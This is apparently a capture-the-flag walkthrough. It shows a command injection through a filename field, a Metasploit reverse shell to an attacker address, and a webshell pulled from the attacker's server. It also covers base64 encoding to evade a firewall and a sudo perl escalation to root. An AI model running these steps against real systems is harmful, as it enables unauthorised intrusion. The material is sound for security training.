In fact, in addition to using the aforementioned EXP file to exploit the vulnerability, we can also use the famous metasploit to exploit the vulnerability.
These signs indicate that they are all vulnerabilities that can be exploited using metasploit
Open msfconsole for vulnerability exploitation and monitoring
msfconsole
set payload linux/x86/meterpreter_reverse_tcp
set lhost 192.168.101.45
exploit
Because the target machine needs to download the webshell of the machine to obtain the corresponding permissions, the apache2 service must be turned on
service apache2 start
service apache2 status
Because in actual combat, we are often blocked by firewalls for some operations, so we use base64 encryption here to encrypt our commands to bypass the firewall.
Note: Why use -O to redirect to the /tmp directory? Because the tmp directory has readable permissions for any user
Then elevate the permissions of the file and give the highest permissions
echo 'chmod 777 /tmp/shell' | base64
Then execute the webshell file
echo '/tmp/shell'|base64
Use burpsuite to capture the package, replace the value of the filename variable, and click send
Because if the value of filename is changed twice in the same window here, the server will redirect the request, so we must re-capture the packet and modify the value of filename multiple times. In order to prevent errors, I created three new ones. csv file
The shell rebounds successfully. Note: The editor also tried many times before it succeeded. If one fails, try many times. Sometimes it is human error, sometimes it is a server problem. Once the response appears 302, it proves that the operation failed.
After entering, use the shell command to view the current user and find that it is the www-data account
Use sudo -l to view which user files the current user has executed by the super administrator
Found that the perl file can be executed using the perl command
Let's perform the operation
perl -e "exec '/bin/bash' "
bash -i
The privilege is successfully elevated, enter /root to view the content of flag.txt
Summary: In fact, using metasploit can indeed improve the efficiency of exploiting the vulnerability, but the key point is to bypass the firewall. In actual combat, some operations are often filtered by the firewall. Therefore, the use of base64 encryption is a very common bypass operation .
